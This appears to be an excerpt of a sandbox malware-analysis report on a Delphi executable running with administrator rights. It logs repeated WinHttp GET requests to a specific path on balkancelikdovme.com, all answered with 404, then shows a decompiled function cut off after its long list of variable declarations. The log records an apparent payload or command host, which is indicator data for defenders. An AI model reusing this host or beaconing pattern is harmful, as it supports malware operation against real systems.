                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:16:38.397792101 CEST 2265 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:38.430927038 CEST 2266 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:16:38 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:16:48.403294086 CEST 2273 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:48.652740955 CEST 2273 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:48.954236984 CEST 2273 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:49.239614010 CEST 2274 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:16:49 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:16:58.437895060 CEST 2275 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:58.471102953 CEST 2276 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:16:58 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:17:08.417718887 CEST 2276 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:17:08.450614929 CEST 2277 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:17:08 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:17:18.414856911 CEST 2285 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:17:18.450731039 CEST 2286 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:17:18 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:17:28.389785051 CEST 2287 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:17:28.422786951 CEST 2288 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:17:28 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:17:38.405219078 CEST 2295 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:17:38.438024998 CEST 2296 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:17:38 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:17:48.433187962 CEST 2296 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:17:48.466253042 CEST 2297 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:17:48 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:17:58.413938046 CEST 2297 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:17:58.447000980 CEST 2298 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:17:58 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:18:08.394927979 CEST 2305 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:18:08.428872108 CEST 2306 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:18:08 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:18:19.080457926 CEST 2307 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:18:19.114404917 CEST 2308 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:18:19 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:18:28.416295052 CEST 2308 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:18:28.450485945 CEST 2309 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:18:28 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>



                  Target ID:0
                  Start time:20:15:26
                  Start date:23/08/2023
                  Path:C:\Users\user\Desktop\r096teIe1H.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\r096teIe1H.exe
                  Imagebase:0x400000
                  File size:1'053'184 bytes
                  MD5 hash:B1E794E29881F56A4E9AFA213D7C622D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:low
                  Has exited:false

                    C-Code - Quality: 39%
                    			E0327D8B0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                    				char _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				char _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				intOrPtr _v44;
                    				char _v48;
                    				char _v52;
                    				char _v56;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				char _v96;
                    				char _v100;
                    				char _v104;
                    				char _v108;
                    				char _v112;
                    				char _v116;
                    				char _v120;
                    				char _v124;
                    				char _v128;
                    				char _v132;
                    				char _v136;
                    				char _v140;
                    				char _v144;
                    				char _v148;
                    				char _v152;
                    				intOrPtr _v156;
                    				char _v160;
                    				char _v164;
                    				char _v168;
                    				intOrPtr _v172;
                    				char _v176;
                    				char _v180;
                    				char _v184;
                    				intOrPtr _v188;
                    				char _v192;
                    				char _v196;
                    				char _v200;
                    				intOrPtr _v204;
                    				char _v208;
                    				char _v212;
                    				char _v216;
                    				intOrPtr _v220;
                    				char _v224;
                    				char _v228;
                    				char _v232;
                    				char _v236;
                    				intOrPtr _v240;
                    				char _v244;
                    				char _v248;
                    				char _v252;
                    				intOrPtr _v256;
                    				char _v260;
                    				char _v264;
                    				char _v268;
                    				char _v272;
                    				intOrPtr _v276;
                    				char _v280;
                    				char _v284;
                    				char _v288;
                    				intOrPtr _v292;
                    				char _v296;
                    				char _v300;
                    				char _v304;
                    				intOrPtr _v308;
                    				char _v312;
                    				char _v316;
                    				char _v320;
                    				intOrPtr _v324;
                    				char _v328;
                    				char _v332;
                    				char _v336;
                    				intOrPtr _v340;
                    				char _v344;
                    				char _v348;
                    				char _v352;
                    				intOrPtr _v356;
                    				char _v360;
                    				char _v364;
                    				char _v368;
                    				intOrPtr _v372;
                    				char _v376;
                    				char _v380;
                    				char _v384;
                    				char _v388;
                    				intOrPtr _v392;
                    				char _v396;
                    				char _v400;
                    				char _v404;
                    				intOrPtr _v408;
                    				char _v412;
                    				char _v416;
                    				char _v420;
                    				intOrPtr _v424;
                    				char _v428;
                    				char _v432;
                    				char _v436;
                    				intOrPtr _v440;
                    				char _v444;
                    				char _v448;
                    				char _v452;
                    				intOrPtr _v456;
                    				char _v460;
                    				char _v464;
                    				char _v468;
                    				intOrPtr _v472;
                    				char _v476;
                    				char _v480;
                    				char _v484;
                    				intOrPtr _v488;
                    				char _v492;
                    				char _v496;
                    				char _v500;
                    				intOrPtr _v504;
                    				char _v508;
                    				char _v512;
                    				char _v516;
                    				intOrPtr _v520;
                    				char _v524;
                    				char _v528;
                    				char _v532;
                    				intOrPtr _v536;
                    				char _v540;
                    				char _v544;
                    				char _v548;
                    				char _v552;
                    				char _v556;
                    				char _v560;
                    				char _v564;
                    				intOrPtr _v568;
                    				char _v572;
                    				char _v576;
                    				char _v580;
                    				intOrPtr _v584;
                    				char _v588;
                    				char _v592;
                    				char _v596;
                    				intOrPtr _v600;
                    				char _v604;
                    				char _v608;
                    				char _v612;
                    				intOrPtr _v616;
                    				char _v620;
                    				char _v624;
                    				char _v628;
                    				intOrPtr _v632;
                    				char _v636;
                    				char _v640;
                    				char _v644;
                    				char _v648;
                    				char _v652;
                    				intOrPtr _v656;
                    				char _v660;
                    				char _v664;
                    				char _v668;
                    				intOrPtr _v672;
                    				char _v676;
                    				char _v680;
                    				char _v684;
                    				char _v688;
                    				intOrPtr _v692;
                    				char _v696;
                    				char _v700;
                    				char _v704;
                    				intOrPtr _v708;
                    				char _v712;
                    				char _v716;
                    				char _v720;
                    				intOrPtr _v724;
                    				char _v728;
                    				char _v732;
                    				char _v736;
                    				intOrPtr _v740;
                    				char _v744;
                    				char _v748;
                    				char _v752;
                    				intOrPtr _v756;
                    				char _v760;
                    				char _v764;
                    				char _v768;
                    				intOrPtr _v772;
                    				char _v776;
                    				char _v780;
                    				char _v784;
                    				intOrPtr _v788;
                    				char _v792;
                    				char _v796;
                    				char _v800;
                    				char _v804;
                    				intOrPtr _v808;
                    				char _v812;
                    				char _v816;
                    				char _v820;
                    				intOrPtr _v824;
                    				char _v828;
                    				char _v832;
                    				char _v836;
                    				intOrPtr _v840;
                    				char _v844;
                    				char _v848;
                    				char _v852;
                    				intOrPtr _v856;
                    				char _v860;
                    				char _v864;
                    				char _v868;
                    				intOrPtr _v872;
                    				char _v876;
                    				char _v880;
                    				char _v884;
                    				intOrPtr _v888;
                    				char _v892;
                    				char _v896;
                    				char _v900;
                    				intOrPtr _v904;
                    				char _v908;
                    				char _v912;
                    				char _v916;
                    				intOrPtr _v920;
                    				char _v924;
                    				char _v928;
                    				char _v932;
                    				intOrPtr _v936;
                    				char _v940;
                    				char _v944;
                    				char _v948;
                    				char _v952;
                    				char _v956;
                    				char _v960;
                    				char _v964;
                    				char _v968;
                    				intOrPtr _v972;
                    				char _v976;
                    				char _v980;
                    				char _v984;
                    				intOrPtr _v988;
                    				char _v992;
                    				char _v996;
                    				char _v1000;
                    				intOrPtr _v1004;
                    				char _v1008;
                    				char _v1012;
                    				char _v1016;
                    				intOrPtr _v1020;
                    				char _v1024;
                    				char _v1028;
                    				char _v1032;
                    				intOrPtr _v1036;
                    				char _v1040;
                    				char _v1044;
                    				char _v1048;
                    				intOrPtr _v1052;
                    				char _v1056;
                    				char _v1060;
                    				char _v1076;
                    				char _v1080;
                    				intOrPtr _v1084;
                    				char _v1088;
                    				char _v1092;
                    				char _v1096;
                    				intOrPtr _v1100;
                    				char _v1104;
                    				char _v1108;
                    				_Unknown_base(*)()* _v1112;
                    				char _v1116;
                    				intOrPtr _v1120;
                    				char _v1124;
                    				char _v1128;
                    				char _v1132;
                    				intOrPtr _v1136;
                    				char _v1140;
                    				char _v1144;
                    				char _v1148;
                    				char _v1152;
                    				intOrPtr _v1156;
                    				char _v1160;
                    				char _v1164;
                    				char _v1168;
                    				intOrPtr _v1172;
                    				char _v1176;
                    				char _v1180;
                    				char _v1184;
                    				intOrPtr _v1188;
                    				char _v1192;
                    				char _v1196;
                    				char _v1200;
                    				intOrPtr _v1204;
                    				char _v1208;
                    				char _v1212;
                    				char _v1216;
                    				intOrPtr _v1220;
                    				char _v1224;
                    				char _v1228;
                    				char _v1232;
                    				intOrPtr _v1236;
                    				char _v1240;
                    				char _v1244;
                    				char _v1248;
                    				intOrPtr _v1252;
                    				char _v1256;
                    				char _v1260;
                    				char _v1264;
                    				intOrPtr _v1268;
                    				char _v1272;
                    				char _v1276;
                    				char _v1280;
                    				char _v1284;
                    				intOrPtr _v1288;
                    				char _v1292;
                    				char _v1296;
                    				char _v1300;
                    				intOrPtr _v1304;
                    				char _v1308;
                    				char _v1312;
                    				char _v1316;
                    				intOrPtr _v1320;
                    				char _v1324;
                    				char _v1328;
                    				char _v1332;
                    				intOrPtr _v1336;
                    				char _v1340;
                    				char _v1344;
                    				char _v1348;
                    				char _v1352;
                    				intOrPtr _v1356;
                    				char _v1360;
                    				char _v1364;
                    				char _v1368;
                    				intOrPtr _v1372;
                    				char _v1376;
                    				char _v1380;
                    				char _v1384;
                    				intOrPtr _v1388;
                    				char _v1392;
                    				char _v1396;
                    				char _v1400;
                    				intOrPtr _v1404;
                    				char _v1408;
                    				char _v1412;
                    				char _v1416;
                    				char _v1420;
                    				char _v1424;
                    				intOrPtr _v1428;
                    				char _v1432;
                    				char _v1436;
                    				char _v1440;
                    				intOrPtr _v1444;
                    				char _v1448;
                    				char _v1452;
                    				char _v1456;
                    				intOrPtr _v1460;
                    				char _v1464;
                    				char _v1468;
                    				char _v1472;
                    				intOrPtr _v1476;
                    				char _v1480;
                    				char _v1484;
                    				char _v1488;
                    				intOrPtr _v1492;
                    				char _v1496;
                    				char _v1500;
                    				char _v1504;
                    				intOrPtr _v1508;
                    				char _v1512;
                    				char _v1516;
                    				char _v1520;
                    				char _v1524;
                    				intOrPtr _v1528;
                    				char _v1532;
                    				char _v1536;
                    				char _v1540;
                    				intOrPtr _v1544;
                    				char _v1548;
                    				char _v1552;
                    				char _v1556;
                    				char _v1560;
                    				intOrPtr _v1564;
                    				char _v1568;
                    				char _v1572;
                    				char _v1576;
                    				intOrPtr _v1580;
                    				char _v1584;
                    				char _v1588;
                    				char _v1592;
                    				intOrPtr _v1596;
                    				char _v1600;
                    				char _v1604;
                    				char _v1608;
                    				intOrPtr _v1612;
                    				char _v1616;
                    				char _v1620;
                    				char _v1624;
                    				intOrPtr _v1628;
                    				char _v1632;
                    				char _v1636;
                    				char _v1640;
                    				intOrPtr _v1644;
                    				char _v1648;
                    				char _v1652;
                    				char _v1656;
                    				intOrPtr _v1660;
                    				char _v1664;
                    				intOrPtr _v1668;
                    				char _v1672;
                    				char _v1676;
                    				char _v1680;
                    				intOrPtr _v1684;
                    				char _v1688;
                    				char _v1692;
                    				char _v1696;
                    				intOrPtr _v1700;
                    				char _v1704;
                    				char _v1708;
                    				intOrPtr _v1712;
                    				char _v1716;
                    				intOrPtr _v1720;
                    				char _v1724;
                    				char _v1728;
                    				char _v1732;
                    				intOrPtr _v1736;
                    				char _v1740;
                    				char _v1744;
                    				char _v1748;
                    				intOrPtr _v1752;
                    				char _v1756;
                    				char _v1760;
                    				char _v1764;
                    				char _v1768;
                    				char _v1772;
                    				char _v1776;
                    				char _v1780;
                    				intOrPtr _v1784;
                    				char _v1788;
                    				char _v1792;
                    				intOrPtr _v1796;
                    				char _v1800;
                    				intOrPtr _v1804;
                    				char _v1808;
                    				char _v1812;
                    				char _v1816;
                    				intOrPtr _v1820;
                    				char _v1824;
                    				char _v1828;
                    				char _v1832;
                    				intOrPtr _v1836;
                    				char _v1840;
                    				char _v1844;
                    				char _v1848;
                    				intOrPtr _v1852;
                    				char _v1856;
                    				char _v1860;
                    				char _v1864;
                    				intOrPtr _v1868;
                    				char _v1872;
                    				char _v1876;
                    				char _v1880;
                    				char _v1884;
                    				char _v1888;
                    				char _v1892;
                    				intOrPtr _v1896;
                    				char _v1900;
                    				char _v1904;
                    				char _v1908;
                    				intOrPtr _v1912;
                    				char _v1916;
                    				char _v1920;
                    				char _v1924;
                    				intOrPtr _v1928;
                    				char _v1932;
                    				char _v1936;
                    				char _v1940;
                    				intOrPtr _v1944;
                    				char _v1948;
                    				char _v1952;
                    				char _v1956;
                    				intOrPtr _v1960;
                    				char _v1964;
                    				char _v1968;
                    				char _v1972;
                    				intOrPtr _v1976;
                    				char _v1980;
                    				char _v1984;
                    				char _v1988;
                    				intOrPtr _v1992;
                    				char _v1996;
                    				char _v2000;
                    				char _v2004;
                    				intOrPtr _v2008;
                    				char _v2012;
                    				char _v2016;
                    				void* _v2020;
                    				char _v2024;
                    				char _v2028;
                    				char _v2032;
                    				intOrPtr _v2036;
                    				char _v2040;
                    				char _v2044;
                    				char _v2048;
                    				intOrPtr _v2052;
                    				char _v2056;
                    				char _v2060;
                    				char _v2064;
                    				char _v2068;
                    				char _v2072;
                    				intOrPtr _v2076;
                    				char _v2080;
                    				char _v2084;
                    				char _v2088;
                    				intOrPtr _v2092;
                    				char _v2096;
                    				char _v2100;
                    				char _v2104;
                    				intOrPtr _v2108;
                    				char _v2156;
                    				char _v2160;
                    				char _v2172;
                    				char _v2204;
                    				intOrPtr _v2208;
                    				char _v2212;
                    				char _v2216;
                    				char _v2220;
                    				intOrPtr _v2224;
                    				char _v2228;
                    				char _v2232;
                    				char _v2236;
                    				char _v2240;
                    				intOrPtr _v2244;
                    				char _v2248;
                    				char _v2252;
                    				char _v2256;
                    				intOrPtr _v2260;
                    				char _v2264;
                    				char _v2268;
                    				char _v2272;
                    				intOrPtr _v2276;
                    				char _v2280;
                    				char _v2284;
                    				char _v2288;
                    				char _v2292;
                    				intOrPtr _v2296;
                    				char _v2300;
                    				char _v2304;
                    				char _v2308;
                    				intOrPtr _v2312;
                    				char _v2316;
                    				char _v2320;
                    				char _v2324;
                    				intOrPtr _v2328;
                    				char _v2332;
                    				char _v2336;
                    				char _v2340;
                    				char _v2344;
                    				char _v2348;
                    				intOrPtr _v2352;
                    				char _v2356;
                    				char _v2360;
                    				char _v2364;
                    				intOrPtr _v2368;
                    				char _v2372;
                    				char _v2376;
                    				char _v2380;
                    				intOrPtr _v2384;
                    				char _v2388;
                    				char _v2392;
                    				char _v2396;
                    				intOrPtr _v2400;
                    				char _v2404;
                    				intOrPtr _v2408;
                    				char _v2412;
                    				char _v2416;
                    				char _v2420;
                    				char _v2424;
                    				intOrPtr _v2428;
                    				char _v2432;
                    				char _v2436;
                    				char _v2440;
                    				intOrPtr _v2444;
                    				char _v2448;
                    				char _v2452;
                    				char _v2456;
                    				intOrPtr _v2460;
                    				char _v2464;
                    				char _v2468;
                    				char _v2472;
                    				char _v2476;
                    				intOrPtr _v2480;
                    				char _v2484;
                    				char _v2488;
                    				char _v2492;
                    				intOrPtr _v2496;
                    				char _v2548;
                    				char _v2552;
                    				char _v2556;
                    				char _v2560;
                    				char _v2568;
                    				char _v2576;
